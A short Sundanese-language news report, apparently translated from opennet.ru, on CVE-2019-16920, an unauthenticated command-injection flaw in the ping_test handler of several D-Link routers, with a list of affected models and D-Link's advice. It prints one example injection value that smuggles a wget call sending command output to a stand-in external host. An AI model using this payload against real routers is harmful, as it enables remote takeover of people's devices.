Kerentanan jarak jauh anu tiasa dieksploitasi dina router D-Link

Dina router nirkabel D-Link dicirikeun kerentanan bahaya (CVE-2019–16920), anu ngamungkinkeun anjeun ngaéksekusi kode jarak jauh di sisi alat ku ngirim pamundut khusus ka pawang "ping_test", tiasa diaksés tanpa auténtikasi.

Narikna, numutkeun pamekar firmware, sauran "ping_test" kedah dilaksanakeun ngan ukur saatos auténtikasi, tapi dina kanyataanana disebut dina sagala hal, henteu paduli asup kana antarmuka wéb. Khususna, nalika ngaksés skrip apply_sec.cgi sareng ngalangkungan parameter "aksi = ping_test", naskah dialihkeun ka halaman auténtikasi, tapi dina waktos anu sami ngalaksanakeun tindakan anu aya hubunganana sareng ping_test. Pikeun ngaéksekusi kodeu, kerentanan sanésna dianggo dina ping_test sorangan, anu nyauran utilitas ping tanpa leres-leres mariksa kabeneran alamat IP anu dikirim pikeun diuji. Contona, pikeun nelepon utilitas wget sareng nransferkeun hasil paréntah "echo 1234" ka host éksternal, sebutkeun parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http: // test.test/?$( echo 1234)".

Kerentanan jarak jauh anu tiasa dieksploitasi dina router D-Link

Ayana kerentanan parantos dikonfirmasi sacara resmi dina modél ieu:

  • DIR-655 kalawan firmware 3.02b05 atawa heubeul;
  • DIR-866L kalawan firmware 1.03b04 atawa heubeul;
  • DIR-1565 kalawan firmware 1.01 atawa heubeul;
  • DIR-652 (henteu aya inpormasi ngeunaan versi firmware anu bermasalah)

Mangsa pangrojong pikeun modél ieu parantos kadaluwarsa, janten D-Link nyatakeun, anu moal ngaleupaskeun apdet pikeun aranjeunna ngaleungitkeun kerentanan, henteu nyarankeun ngagunakeunana sareng nyarankeun ngagentosna ku alat anu énggal. Salaku solusi kaamanan, anjeun tiasa ngawates aksés ka antarmuka wéb pikeun alamat IP anu dipercaya wungkul.

Ieu engké kapanggih yén kerentanan ogé mangaruhan model DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 jeung DIR-825, ngarencanakeun pikeun ngaleupaskeun apdet anu henteu acan dipikanyaho.

sumber: opennet.ru

Tambahkeun komentar